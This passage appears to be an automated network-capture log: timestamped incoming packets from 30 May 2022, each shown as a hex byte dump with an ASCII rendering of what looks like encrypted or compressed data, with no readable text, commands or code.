0a c8 b3 59 b3 77 24 e4 3a 28 43 dd 25 46 6d 1e 4c a6 09 f9 8b 82 bb e3 1f ae 47 5f e0 d0 d0 df f8 f8 fd b7 f9 ab 67 57 64 ff 73 02 26 69 fe 1e e6 e8 56 7c af d1 0e 4e fb Data Ascii: $X;&jNG{*&]6<rR2[3K"]qAL #Nka+}MaoXQ]Nc?TN@8Y2G.lV?W?sC0_`!An8z}^<`QVwGmnG$FSYw$:(C%FmLG_gWds&iV\|N
2022-05-30 12:45:59 UTC	584	IN	Data Raw: cd 93 a0 9e 10 ba 81 23 c3 06 42 8a 49 75 f7 e6 40 31 4c 1b f1 f2 4e 78 1b 14 bc a7 d5 47 7b ec 91 cc 64 fb 46 03 1e 2f e0 d7 18 3b c1 37 70 0e 36 60 e5 13 4d 9b ec d5 77 ff 29 46 f9 d8 c6 41 4f 62 fd ed ca fa 69 d5 18 de 5d 4f c6 61 9e 0e 85 c6 c7 60 96 e6 89 29 58 a2 b2 e4 50 65 d2 28 94 ab e8 e8 c3 67 f6 eb d2 2e b6 4d fa 21 38 ea fc b4 0b 9d b1 c0 89 a1 29 88 b9 e7 d5 26 61 2e b0 43 54 9e 8d 3a b8 3b 79 a5 b5 4f 38 2d 13 70 6e f6 bb 73 50 b2 f5 a2 11 5b f8 31 fb 82 c1 4d f9 df cf 02 f8 a6 79 c4 a0 6a b5 6d 40 24 41 e8 02 b4 ff 57 ab 93 2a 33 4c b8 7d af 17 90 62 ab 15 1b a9 79 18 8e 8b 6a cf 4c 6c 8f 37 22 c1 7f 4c f7 8e 35 16 aa a6 7c 59 47 ee 0b b7 b6 5b 7c 1a 38 65 c2 20 75 b6 f4 f4 3c 75 78 40 19 42 05 47 15 6b 4f 0e c8 26 df b5 41 f5 6b ef 55 e2 Data Ascii: #BIu@1LNxG{dF/;7p6`Mw)FAObi]Oa`)XPe(g.M!8)&a.CT:;yO8-pnsP[1Myjm@$AW*3L}byjLl7"L5\|YG[\|8e u<ux@BGkO&AkU
2022-05-30 12:45:59 UTC	585	IN	Data Raw: de 6c 49 e6 4d 45 c9 20 5b 8d 1d cb 8f 81 0d f5 38 44 73 49 e9 22 a2 ee 05 a9 0a 4f bf bc fa 19 a7 64 3d 9d 80 05 5d d7 cf d6 30 36 69 c7 e9 0f ed b3 56 9c 54 2f 06 58 d0 80 cc 9b ff 04 27 41 27 ad 79 d4 26 78 84 fa 79 aa 4a a2 73 94 f3 a1 fc 20 3f e0 a2 ff 15 a4 bd 44 f6 ab d3 5d 1e 9b 19 55 36 2f 5e d2 1c 0b 6c f7 7d 14 f0 f8 08 61 32 7c a3 39 69 16 f8 c8 8f 9a 45 e0 48 19 70 18 26 a9 df 25 e2 54 82 b8 eb ad cd e9 81 90 2f fd d0 2f c8 77 fb a0 52 98 b4 16 a8 78 54 06 dc 4c 08 4a 2e f0 0e 98 26 9c 81 8b 96 de 31 a2 2b b4 43 f7 64 93 cb 17 5e a9 fc dc 7e ea 0f 3e f3 9e 6e 1b a5 f5 43 04 98 81 1e e7 aa 77 ae d7 81 73 8c c4 97 54 03 1b 5b 1f 3f df 11 2c d4 97 c4 09 53 59 ec f3 76 65 df 26 27 7e d9 de 62 15 e2 31 04 6e 89 b6 5a e7 62 32 e9 65 3a ec 38 c5 3c Data Ascii: lIME [8DsI"Od=]06iVT/X'A'y&xyJs ?D]U6/^l}a2\|9iEHp&%T//wRxTLJ.&1+Cd^~>nCwsT[?,SYve&'~b1nZb2e:8<
2022-05-30 12:45:59 UTC	587	IN	Data Raw: d1 97 56 93 b2 9b 2b 8b 23 4e 5e 7f 91 83 ed ef 9e 81 15 1f 9c 70 a8 22 58 d8 d9 7a 3b 34 71 5b 00 71 db 1f 54 cb 67 3d c2 c4 76 bc 58 47 ee aa ac ff 2e 6c 44 33 a5 2a bc 90 91 4a 58 cc 9d 9c 7e 9f 12 d9 9d 5f 86 8d 06 e8 e3 3e a0 0d 6f 1f 0f 91 34 29 d0 67 f4 cd 62 ab c3 e4 69 b7 9a f1 fb 18 39 be 54 61 84 70 32 da b4 ff d5 ab 9a 86 4f 85 8d 47 cd 8f c9 41 78 2d 6a bb c2 5e 89 0a c6 3e 8d 06 4c 1d 9c d2 74 77 8e 3a 0c ac 75 91 af 33 2e 9e 25 40 73 49 09 2c c3 97 60 17 be 81 ae 70 27 c5 08 8c 5e 7e 2f 64 be 33 76 ed 7f ae 2d da 06 c4 44 48 d3 2d b4 2c 97 24 66 77 4a af 41 97 c2 b5 29 00 2c c3 d6 7c 7f 08 2c 31 88 e4 2a 06 c3 a2 91 91 83 26 72 b2 d7 52 47 c8 39 70 0d c0 73 a2 45 0a 6d 85 c3 32 0d eb f6 11 37 08 f1 30 e0 4e b2 1f cd fa 70 f5 31 68 21 c7 10 Data Ascii: V+#N^p"Xz;4q[qTg=vXG.lD3JX~_>o4)gbi9Tap2OGAx-j^>Ltw:u3.%@sI,`p'^~/d3v-DH-,$fwJA),\|,1&rRG9psEm270Np1h!
2022-05-30 12:45:59 UTC	587	IN	Data Raw: f3 16 53 e3 af c9 c3 90 19 0c 20 f5 be 97 24 3a a8 f9 87 61 4d d1 76 4c 27 0d 56 ca 9b 5c be 46 3b b7 46 f4 36 ee 71 9b 75 df c4 80 51 11 82 ed f9 61 dd ad e1 e0 14 8c 08 79 15 91 08 9a e5 63 d1 b8 48 25 4b ab 34 fe b7 c1 93 8a 43 a7 b3 32 6e 53 01 d1 63 a6 81 dd c5 40 13 2e be 73 c3 2a 1b 51 19 38 26 32 48 e2 2b dd 41 b1 12 97 cc 8b 3d 3b a4 d5 08 97 43 a2 14 0e 5a 82 bc 61 c9 79 79 34 93 ea ee 81 66 84 70 b6 da 60 53 32 ff cf f2 44 6a 1b fb e8 d9 42 63 3b 1e 50 ba 7a d7 ed 2e fe dd 44 8e da b0 61 2d 0f b3 f4 39 5c 44 23 a8 25 b4 1d 4d a6 84 fa cb f5 82 60 ed 44 17 41 dd db b3 72 ed 13 f4 c5 80 76 ef 1b 40 4f d6 bc 51 4b 40 f0 72 32 f3 1c 7a b2 39 cf 8f 7f 82 5e 63 37 32 32 fd f7 a9 91 3d 29 42 12 cf d4 a5 5a ad eb 76 df 1b b8 dc 0e eb 9a f7 23 28 2f 4b Data Ascii: S $:aMvL'V\F;F6quQaycH%K4C2nSc@.s*Q8&2H+A=;CZayy4fp`S2DjBc;Pz.Da-9\D#%M`DArv@OQK@r2z9^c722=)BZv#(/K
2022-05-30 12:45:59 UTC	589	IN	Data Raw: 18 90 be f2 17 54 f2 d8 5d 7a c2 0e f4 0c 68 61 e5 13 f5 bb 92 e4 f2 f2 df 46 f9 60 3e 7e 39 1b e4 7f ce fa 50 ef 66 cc 5e 4f b1 8f 0c da 7c 9c 4c ae 7e e2 c9 22 a7 27 72 9f df 96 18 c0 2e de 81 c7 f0 a7 a9 38 97 5c 37 c3 e8 72 b5 74 e9 5f 67 62 c5 f1 bc 5a 0f 77 46 0c 6f 27 da be 09 37 5a 9e b7 ee f5 73 d8 4a 09 ce f5 97 01 73 61 41 b5 b4 53 72 12 f0 79 52 27 cc df 3b da 3b 86 94 35 eb 73 68 91 1a cc 7e 49 25 83 98 a7 4e 45 89 e8 a8 5b 2a c1 49 cc 62 fd f7 fc db 2f b6 e7 0a a5 cf df a7 22 ed bc d5 e9 7f 37 57 d9 f5 3b 15 8a 67 e9 1c c1 b2 b1 4e 47 1c cd 43 a2 f9 66 f3 e1 b2 9d 89 b6 7f 3a d4 8f b4 b0 50 41 38 33 50 64 73 06 04 24 df b5 3a d5 7b 30 42 ef 6e 09 f6 33 03 37 b0 cd 1d d1 d5 31 ba fd a1 19 f6 1b 4f e9 2a 98 f2 54 c0 9a 1b 6c be 70 94 84 e0 b4 Data Ascii: T]zhaF`>~9Pf^O\|L~"'r.8\7rt_gbZwFo'7ZsJsaASryR';;5sh~I%NE[Ib/"7W;gNGCf:PA83Pds$:{0Bn371OTlp
2022-05-30 12:45:59 UTC	590	IN	Data Raw: 12 d4 83 01 86 18 1a 0b 34 fa 64 8e 05 58 ed 0a f3 06 2f ea 0a 9e 2d 7a 7f 64 01 41 b2 6c bb 88 45 d4 24 ba 58 c3 f4 ee 53 21 04 1f 28 e1 72 59 d3 32 d8 ff 14 be c0 85 98 21 97 79 2f 7f 99 9a 5b 0b 6e d0 b1 7a 29 d3 39 1f 0d f7 82 25 16 2c 52 c3 f5 77 6b 72 30 9a 45 e1 62 7c 47 33 3a 20 30 f9 d3 d0 6b bf fe fc 98 2f ff 39 76 78 10 d0 a0 60 11 44 da b3 f0 32 b8 f2 9a ee c8 4f f3 3e cb 52 e2 1c d9 e8 1e c0 68 77 0c 6e d5 ce 7c 8c f1 e9 87 33 42 0e 2f 31 ad b3 56 bd 3c 6e a2 28 53 7e c0 a6 70 05 de 93 d6 0c a7 90 05 4d 9a e2 98 10 f3 f6 66 70 18 dd 4e a4 ac e9 98 52 d2 a6 2d fd f8 c5 1c 15 e7 86 61 fa cb 61 99 3c f2 ea 40 c2 bb ba 80 0c e8 ee 6c e1 ef a6 c0 0d b2 0c bd 4f ce 94 2c 5f 85 bd 97 da 64 87 3a 3d e6 a3 78 4e b1 f9 2a 0f 43 88 46 60 e5 10 e0 a3 93 Data Ascii: 4dX/-zdAlE$XS!(rY2!y/[nz)9%,Rwkr0Eb\|G3: 0k/9vx`D2O>Rhwn\|3B/1V<n(S~pMfpNR-aa<@lO,_d:=xN*CF`
2022-05-30 12:45:59 UTC	591	IN	Data Raw: f6 bc 28 ef 11 b8 30 c5 f8 f8 7c 16 a4 aa db b8 2e 3c ca 40 a1 3b bf c9 c8 bb b3 b6 3b 98 22 b9 0e d9 b8 a5 ae 2b dd 0b 61 fa a4 88 44 63 df 23 97 29 d2 67 f4 fd 24 48 38 aa ad b7 9a 85 07 53 af bd fd ab bb d0 e7 c3 cb 54 aa 93 5a d7 1e b0 fa 54 62 20 cb de b4 0f eb b1 3c 28 32 a5 89 bf c7 8e f8 b1 61 2d 03 a2 b2 3b 5c 44 59 5c 29 13 1f 4c a6 d4 97 93 51 44 1c 17 a4 13 b0 05 fe 24 29 42 03 c4 ba 2a 2e 64 57 60 fd 62 27 24 69 fe c5 cb c9 8c 16 1e b1 e0 e5 05 36 fa 8d f7 55 df cd 77 a9 23 ef 2a c7 bc 97 0f e8 17 ed 1f d3 76 ff 95 47 c2 09 e9 9a a2 a1 e9 9c 58 3b 24 ac 12 06 24 82 a1 8f f1 6c ee e5 b7 09 20 45 d1 99 02 38 ac b6 b1 b9 fa 97 f9 58 3a c9 b6 b9 ca 8d 05 38 59 cf c1 12 e3 55 d1 a1 60 4b 00 02 20 86 18 ac 86 5a 56 22 bc e8 0f 13 c1 f2 41 d4 9e 3b Data Ascii: (0\|.<@;;"+aDc#)g$H8STZTb <(2a-;\DY\)LQD$)B.dW`b'$i6Uw#vGX;$$l E8X:8YU`K ZV"A;
2022-05-30 12:45:59 UTC	593	IN	Data Raw: 2c a7 e5 f9 ba 45 c3 e8 7b bd 2a f1 d8 3b 63 4e 3f 5b d0 5a dc c6 0c 3c 77 bf f8 4e c8 a5 15 1a 3d d9 b0 00 b4 06 c8 76 9f 82 0f 4a da 3b e1 49 8d 66 85 b9 c5 76 3d 75 50 36 47 03 54 c2 36 f4 23 b9 c4 93 a4 b7 a0 43 67 c5 e0 5e 30 00 d3 d7 f5 d5 46 49 dd 49 b2 fc 65 b5 10 ea 13 f6 27 48 d5 63 69 6b 42 2a 70 b2 23 c0 fa 8c 0e 1d f5 e9 1c 4a 95 f7 47 b9 e3 b7 3e 2e 5f 12 f2 e4 c1 0e 89 b6 f4 9e 3c 51 61 f8 ea c4 75 14 75 3b 2c 50 4b 26 df 36 ae 31 9a 2a b2 95 22 cd f2 b6 46 bc 8e 46 32 b9 3e cc 37 7e 12 c2 f9 ac 44 90 68 71 82 21 f5 4e 56 22 ca 7e 9b 33 24 4d 28 50 a6 2b 13 05 22 a8 08 8e 7a 72 47 dc 0d 32 6f 72 9b 75 b6 bd 6d 44 ff 7c 12 06 07 07 bd 1f 1f 14 d9 3e b0 41 e8 5f 73 32 58 22 c4 b5 ff 13 54 be 15 47 31 f4 5d ed d3 3c 99 fa c5 89 2e 6c a1 72 2e Data Ascii: ,E{;cN?[Z<wN=vJ;Ifv=uP6GT6#Cg^0FIIe'HcikBp#JG>._<Qauu;,PK&61*"FF2>7~Dhq!NV"~3$M(P+"zrG2orumD\|>A_s2X"TG1]<.lr.
2022-05-30 12:45:59 UTC	594	IN	Data Raw: d2 c8 6a 9a 2d c6 60 36 2c f8 2c 9d f2 ce 34 cb c2 8c be 39 94 43 cb 32 cd ff 6a b1 d1 e4 8a 28 54 60 14 ff fc 98 fe 6f f8 77 78 95 9b b9 52 86 cd d4 5f f0 32 31 01 48 8d 52 2f 0c c1 42 8b 44 f4 f7 d9 9a 00 4e 00 f2 27 e2 44 85 3b 27 e1 78 cc 81 10 a3 23 ae b3 d5 43 32 e5 cc 32 53 7e 07 e3 0d cd ab 95 1d a1 a7 90 c9 4e fe ba 64 11 f3 7d 51 44 90 9c 3e 94 d2 89 5a d7 1b e8 d6 4a 25 9a e3 ea 24 b3 b3 05 36 9e 10 33 1a 62 01 b6 61 cf c0 cf b9 ef 38 da 3b 4e 72 88 78 f3 12 a7 79 4a d4 2e cc e2 ee 13 99 78 bf ad 7b 4e 35 27 a2 7a ee 0b 7e 48 b2 67 0d 3e 2d 53 93 00 73 99 5d 4d f9 d8 66 50 4d 26 54 2e 9b a9 06 e0 19 55 87 18 34 0c 6a c8 fc 1d b3 14 15 13 13 c9 58 de df 1b d9 66 1c c0 2e d0 de 63 bb 27 17 39 11 48 35 c1 9d 25 80 b7 00 a2 98 89 16 ba f8 a8 e0 9f Data Ascii: j-`6,,49C2j(T`owxR_21HR/BDN'D;'x#C22S~Nd}QD>ZJ%$63ba8;NrxyJ.x{N5'z~Hg>-Ss]MfPM&T.U4jXf.c'9H5%
2022-05-30 12:45:59 UTC	595	IN	Data Raw: b0 93 2c 23 9e 90 54 aa cb 12 5e cc 5f 88 97 ea d9 42 8a e4 01 d1 c6 e6 e3 cb 2c fe bb 38 1d c7 04 24 59 ed a1 24 42 5a 7d 12 cf b2 40 18 f7 c0 7a 80 f4 b2 72 a2 11 bb 18 b0 5f 8b 38 a2 8f 83 26 be 7c 2f 64 97 8c 73 cf be 50 7a c7 c2 a8 5d 0f f7 61 4d 62 08 9f c8 05 f1 62 08 c6 cd 02 2a d0 5b de ef 31 b3 9f d8 e1 ab 52 b3 a4 63 be 44 c3 08 e9 da 82 26 5b 3c 6f cf 63 88 00 02 dd 1d d3 dd 91 b8 ff e5 e7 81 23 20 66 40 eb 2f 40 a5 41 c3 b7 21 7e 78 d0 19 2b e9 22 29 2d 42 59 30 87 8d 29 20 fe dd 4d 6e 84 d0 54 5b d7 cf b6 e9 99 70 3e 94 2b 46 f7 06 b5 5c af 2e 86 1d c3 90 10 30 63 27 4b 44 7f c1 f0 2b 3f a0 c2 f5 9a 7a 65 7e c4 43 95 75 64 92 8b 33 8b e5 89 a6 03 8a 22 1e 3e 36 fa 99 f8 6a 08 6e 59 92 f5 6c 5b 7e 94 39 68 a5 14 15 3c 26 5c 5a 37 f9 09 eb 9b Data Ascii: ,#T^_B,8$Y$BZ}@zr_8&\|/dsPz]aMbb*[1RcD&[<oc# f@/@A!~x+")-BY0) MnT[p>+F\.0c'KD+?ze~Cud3">6jnYl[~9h<&\Z7
2022-05-30 12:45:59 UTC	596	IN	Data Raw: 14 81 b6 2b cf c8 41 c7 46 b5 76 53 d7 16 d5 46 3c e2 7e b8 a2 ea d5 a2 0b 1c 4e 52 0a a5 63 30 b9 0f 02 73 8a 22 c1 0c cb de 9c 10 fc 13 fd 33 3f 21 3c 2a 4a cf 55 c3 50 c7 a8 3f 9b 32 d0 0a 0b c3 8c e2 6b 67 c4 f8 47 fd ac b1 80 24 a3 04 ba ee ae 1f ea bd 93 51 e9 b6 b2 c3 43 84 b6 a0 c4 7d 17 fe f9 92 c2 f9 d9 e5 48 67 c8 77 16 7e 94 50 ad fe 31 e0 9b ea 19 81 2b f5 60 9e ae cb 94 3c 56 29 7a 3d a8 26 f3 f6 72 9b 9d a8 b1 e0 ef ec b8 1e 8d 52 0f d6 f4 7f 97 30 4a 1c 55 b5 5e 72 c4 d6 a3 08 89 33 10 ce cb 01 33 01 f4 69 ed a7 46 e8 3a 25 ba 0a 48 a9 79 af 7e 9b b4 18 51 33 93 a7 5f 7a a5 42 54 89 93 29 3f 74 53 44 b2 f4 dd 47 02 e4 98 4c ba 17 7b 71 3d 62 be 44 07 b3 54 6a fe ea 6d 10 a9 cc 58 3b 64 b5 13 dc f3 76 33 7d 1f 4f e3 c6 fb b1 86 1c d7 cb 9e Data Ascii: +AFvSF<~NRc0s"3?!<*JUP?2kgG$QC}Hgw~P1+`<V)z=&rR0JU^r33iF:%Hy~Q3_zBT)?tSDGL{q=bDTjmX;dv3}O
2022-05-30 12:45:59 UTC	598	IN	Data Raw: ee 08 f9 9c ce 5d d4 b2 47 93 ff fb da f0 17 73 45 72 ff 38 5b 6b f9 ac 48 ad 9a 0a 0d d6 c9 59 dc e7 a1 c1 98 84 35 be b3 7b c8 41 99 7d 89 3e 19 8c b1 d2 1a 21 5b aa 2d 62 53 36 6a ee f9 48 24 6b b9 e9 65 cf 9b b7 da 21 06 c2 d7 c6 f4 06 1e 24 e4 c8 4c 4a 41 cb 59 0f 05 57 05 0a f0 66 c3 04 05 32 ca 87 ca f5 7b f0 0b 27 a2 7a ee 13 70 6d 9b a3 b3 98 87 d6 65 9e 71 c9 8e b9 06 27 b3 43 46 5a 25 ec ca fa 50 1f f3 5e e3 df b2 fa 1e b0 0c d4 4a ee c6 6e 37 dd b0 86 27 90 57 28 9a e8 2f 55 17 17 70 19 80 b4 11 48 35 b7 fa af b6 8e ff 5d 67 8a 47 aa 31 dc 11 f1 6f 0d 3c 77 32 fb 58 e2 a4 15 4f 6d 45 6d d0 3b 52 4a b2 93 e9 9d fa f6 3b 52 d7 58 13 a1 91 94 ce f3 60 e6 dd 6a 88 b8 10 94 3f e3 85 c8 12 e7 3d e5 bf 67 4c 99 85 0d fe 23 53 16 b3 7d 81 a6 fa 91 77 Data Ascii: ]GsEr8[kHY5{A}>![-bS6jH$ke!$LJAYWf2{'zpmeq'CFZ%P^Jn7'W(/UpH5]gG1o<w2XOmEm;RJ;RX`j?=gL#S}w
2022-05-30 12:45:59 UTC	599	IN	Data Raw: 7c 9b a8 9b 9c b9 f4 2b 03 f5 14 64 81 1d f7 61 68 ed 73 71 03 77 43 77 99 24 31 fd 51 49 aa 03 a3 85 c6 f0 ae 1d 20 e8 cd 59 bd 72 1e 3b f7 16 11 07 75 f4 3d bd 89 7f 0b 7d fa a9 bc 56 c2 f8 b4 15 23 ee 0b ee 43 43 56 04 5b 8d 61 a6 67 08 df 81 21 bd 09 c3 ea 11 62 95 99 2d a0 d0 f5 78 24 00 57 ae c8 c1 f4 50 b6 10 eb 81 8b c6 f4 47 ea 7b 6d 77 88 be a3 ed b2 e8 6a 7b 7f 58 ff 03 1f c6 25 0a 45 d6 9c fc 63 48 b0 ca 6a d2 fb 95 f7 1e 74 ef d1 47 27 8a 61 6b 37 01 02 60 96 f2 6a 54 15 1a 18 09 6a 56 a9 8b 4e 92 5f 9e bb 07 a6 19 14 48 2c e8 1b 49 75 35 b9 e1 7a 6b af 1e bd 1c 38 20 b3 89 d0 55 6f bd fd fc 98 9e 13 c8 fd 3c 34 53 aa c7 0d 49 6f 9f 33 b1 54 75 d7 62 f8 a3 0c 92 17 82 91 ec 53 a4 bf 20 46 d5 cb 29 2d ba 9b e5 ff 1d e1 ba 06 dc bb a3 57 b2 59 Data Ascii: \|+dahsqwCw$1QI Yr;u=}V#CCV[ag!b-x$WPG{mwj{X%EcHjtG'ak7`jTjVN_H,Iu5zk8 Uo<4SIo3TubS F)-WY
2022-05-30 12:45:59 UTC	600	IN	Data Raw: 61 f8 e9 c6 a8 ca 93 5b c5 80 24 76 88 5d 39 02 1e ea 36 53 e9 46 25 3d 08 4c 36 82 a8 17 29 77 45 02 6d 49 ba a8 4a 07 38 fe 79 9f 08 ee 8d b2 3d f1 96 df a2 cd d9 27 ce a0 48 03 9d 10 8a 05 93 5e c5 a4 ba 49 0d 8d 70 04 8f d7 6b b3 4b 68 74 85 71 80 67 40 e9 d7 8d 1b 02 dc e1 7a 6b 3a 52 c6 fa 65 24 c0 df b7 25 a0 c6 16 77 b3 ef fd 4f d3 ae f1 99 af 19 77 57 01 34 dc b5 22 85 82 28 1a 2b ac 78 fd 95 d1 e0 16 fb 71 5b 02 d2 8c c9 e2 59 65 bc 8e 92 65 a4 70 96 95 7c 43 97 1e 35 92 8b ad ee 56 a8 13 ad 04 74 76 27 29 91 24 1a 42 5f 08 a9 bb 51 27 bd 75 cb 40 0e e7 01 52 04 5b f8 03 1e f6 37 4c a2 7c d9 4e e9 60 b4 60 a0 14 51 6a 44 8f c0 0f fe 43 82 bb e3 f2 e3 d7 37 06 dc b3 53 63 8c 8c 72 7c 2f 64 bf 69 db 12 80 2a de 78 06 8f cd 0c a7 ec bf 22 b0 04 36 Data Ascii: a[$v]96SF%=L6)wEmIJ8y='H^IpkKhtqg@zk:Re$%wOwW4"(+xq[Yeep\|C5Vtv')$B_Q'u@R[7L\|N``QjDC7Scr\|/di*x"6
2022-05-30 12:45:59 UTC	601	IN	Data Raw: 09 34 ea 4b dc 81 e2 4f 75 85 0c d4 28 fc 8d 6a 6d c7 b1 f9 77 96 1c b5 52 47 55 16 d9 c0 01 4b 27 12 14 9b e1 f5 f4 bc c0 b5 41 8d f0 04 77 b1 78 66 d6 74 ac e4 ff 10 fa 20 cf 95 fc c9 8f 71 23 0e a9 ee e6 00 83 ea e4 5c 4f 3a be 3a ac fa 02 cb 06 95 17 2f bb d1 de 96 8c dc 82 38 dc a5 9b 9e 5b d4 b7 2c 43 64 c5 be 97 cc 36 b8 11 ff 28 6f ef 03 c1 d9 b0 70 88 b9 6a b7 b0 6d 26 b8 93 fc 4c 8c ee dd 43 e5 b1 07 4b b2 c0 54 25 e5 04 b0 7d 06 14 2b a7 e5 9e 45 99 de 47 e1 d6 0d 55 41 f2 10 63 f3 cb 16 0a 23 24 43 ec a9 4f be e4 72 90 77 0a 3d ff c3 d2 fe ae 79 28 e9 f5 8f 1c a6 cf 20 d2 6f e2 25 4a a6 5b 2b dd b6 f2 73 f4 9a 8d 0e 8d 4a 7c d2 9f 3a 27 3e 4d 81 09 80 03 1f 4a 15 df b2 79 b8 18 1d 86 91 20 c4 f8 1e 90 ab b0 95 9f 8c 21 4a 95 b0 53 ce a5 f8 77 Data Ascii: 4KOu(jmwRGUK'Awxft q#\O::/8[,Cd6(opjm&LCKT%}+EGUAc#$COrw=y( o%J[+sJ\|:'>MJy !JSw
2022-05-30 12:45:59 UTC	603	IN	Data Raw: 5f 51 10 37 7a 54 d5 d0 c5 65 c5 93 7e ef 96 fd c6 36 49 6c e2 d6 3c 4c e2 61 ad bb b4 fa 15 a9 f0 67 9d 81 04 5b 5c e4 35 90 36 b6 40 17 f0 3f ae 49 7e d8 6e 32 61 6b 7b 0b cf 50 53 be 10 37 36 7c 8e a3 48 1a 49 3b 06 1d 13 05 1f 5c 4d f0 bf 6e a3 41 89 ce 83 35 03 8a 44 1e d6 ca 71 1d dc b1 54 52 5f 6a dd 4e 50 45 bb 93 ee 8e a0 e8 c2 d9 2b 90 69 57 a9 44 d2 6d e1 ce 6b c3 b7 6e 04 97 8a 1d 37 ba 62 00 03 1d d6 5e 4d 19 87 ef a4 47 10 29 6f d7 90 18 ce 45 86 ab 83 1c a8 89 9d bd 2b e5 96 16 00 b1 01 11 5e b4 62 5e 2d 08 d7 50 3a 0c fc 11 ab fa cb f4 b3 56 bb b0 2e 44 a3 8b f5 c4 cb 8d bc a8 6d 5a 0d 07 31 6b d6 f0 ff 94 d3 a0 2b 8f df e8 56 94 cd 32 90 71 9f 2b 9d d0 79 8e e0 e3 60 e2 54 b1 5d df b8 7a 9a 60 eb 17 2a ec 36 81 0c 6b a1 b5 ac b1 51 99 0e Data Ascii: _Q7zTe~6Il<Lag[\56@?I~n2ak{PS76\|HI;\MnA5DqTR_jNPE+iWDmkn7b^MG)oE+^b^-P:V.DmZ1k+V2q+y`T]z`*6kQ
2022-05-30 12:45:59 UTC	603	IN	Data Raw: 97 0f 5b 98 ae 6c 24 98 1f d8 4a 8c 2c f1 5b 1f 2f 24 fc 6f e1 e9 dc 24 12 23 f4 56 f9 b4 c3 37 37 07 8e 29 c7 00 6e 14 d0 c5 e6 0a 62 e5 24 f5 7e bb 31 ae 96 79 ad 51 77 a6 45 8d b5 00 d4 7e 0e d0 58 06 38 54 df 17 4b 82 60 de f7 55 e9 00 e2 60 72 b8 d7 a3 89 76 95 6d 0e 9b 74 47 b0 8c 47 61 20 3f 50 c3 c6 c3 b0 ca 7e 05 85 63 3f 9e 01 71 53 4f cf 01 15 a8 b5 eb 89 c9 f8 f2 60 74 f5 1a ab f4 91 b2 c0 09 66 d7 d1 d3 58 13 7e ce c3 bf ce f7 69 6b f0 65 c7 6b b9 17 84 95 48 19 b9 c8 b5 75 c4 5c 06 9d 8a be 13 58 55 43 a5 90 a8 ad 33 bb 6b 4a 18 7b e0 d9 95 f2 1a 02 34 a4 ff 3e bd 3f bb 96 97 ec 16 44 35 4e 61 28 f8 d9 57 6c 8b e1 de d8 4d 75 ed 07 be 39 85 eb db be a5 d7 ac fd c3 24 03 ec 55 c7 81 e6 d3 23 12 91 7c 8d 5f 1f 58 ad 53 00 3d c5 c6 a3 03 43 dd Data Ascii: [l$J,[/$o$#V77)nb$~1yQwE~X8TK`U`rvmtGGa ?P~c?qSO`tfX~ikekHu\XUC3kJ{4>?D5Na(WlMu9$U#\|_XS=C
2022-05-30 12:45:59 UTC	605	IN	Data Raw: 1a 87 0d 21 b4 36 a1 c5 0e 74 81 40 b5 7f 14 d9 fb 7e 9e b2 20 c3 c9 24 54 54 ca 9b f5 db 8e c3 f6 fa fd 48 79 bc 73 2e 3a 4e 1f 64 29 78 21 cf e0 83 4a 79 26 5c 8e 1b 46 3b b8 07 9b eb 78 d1 b8 c6 6c ef df 01 22 6f 84 39 76 b3 ee 76 c1 e6 a3 55 fe e4 66 bb d6 b1 71 78 5b a4 8c 3c af db 2b 83 78 f2 94 5f 58 8b 06 e8 6f 4d 74 03 65 48 cf a6 5a 3a dc d1 b0 f0 e3 aa d6 93 1f 0c 68 8e 3b 24 69 76 fd 98 7b df 51 2a 0a 28 91 58 5d 82 ca 23 d9 3f 83 ea 1b 62 6f fc af 45 cd 60 1d a5 34 98 9a c8 21 b0 0b 01 84 92 a0 37 a8 4b fd 3b 26 77 10 b8 ff 6c 9e e8 7e 44 ec 23 b0 9c ff e6 5d f9 4b 06 08 b4 7e 72 db 6b fc b4 ff a9 72 d1 e2 70 d6 8f cd 0c 72 a8 4d 73 3e 41 ca aa 64 8a fc 92 39 ea 16 e9 d0 3c 8f e4 1c c7 5e 28 de 55 2c 0f 1b 71 c3 f3 c1 62 9c 72 ec d9 9d c0 7d Data Ascii: !6t@~ $TTHys.:Nd)x!Jy&\F;xl"o9vvUfqx[<+x_XoMteHZ:h;$iv{Q*(X]#?boE`4!7K;&wl~D#]K~rkrprMs>Ad9<^(U,qbr}
2022-05-30 12:45:59 UTC	606	IN	Data Raw: 95 36 a9 b7 63 c0 27 d4 95 0e 2f 70 79 46 9b e4 67 7f d3 68 e6 02 75 ef 86 12 da 5d 81 f4 2d 85 a9 ee de d8 27 cc ee d8 b9 be 7e ec b3 79 c6 42 b2 99 eb dd de 58 a2 36 50 23 e4 25 bc 0a 61 18 93 2c a4 a9 b5 77 c3 71 e7 c4 44 03 02 f1 de c6 61 4e 3f 3e 6b 1a 78 f1 e4 b7 b2 19 ba 65 30 a1 1a c3 ea 32 7f 5d b6 cc c6 e6 b7 15 9b 1c 63 c4 6b da 36 36 81 1c c0 d9 2b a3 78 1c 30 b4 9c 42 be dc ba f0 8f 32 a1 5e f7 d6 13 56 4f 02 91 df 5f 93 14 5c 02 6d f2 f1 40 2c 63 a2 54 79 13 11 0f dc 67 58 ac 3d 40 a8 7c 37 22 ce 4d c8 a7 8a e6 11 30 45 fb d4 45 b9 e3 3d 4c 16 7e 99 fc ea ba 95 86 31 bd f5 3c 01 61 cb 02 c4 f8 47 96 83 c4 8f a0 3a de b5 6a be f7 eb b2 94 07 cd f2 b6 8b c0 69 c3 a5 c3 79 33 ba fd 11 2a f8 a3 4d 4b 28 98 f2 5c e2 b0 a7 81 3d d9 91 8b e4 80 a7 Data Ascii: 6c'/pyFghu]-'~yBX6P#%a,wqDaN?>kxe02]ck66+x0B2^VO_\m@,cTygX=@\|7"M0EE=L~1<aG:jiy3*MK(\=
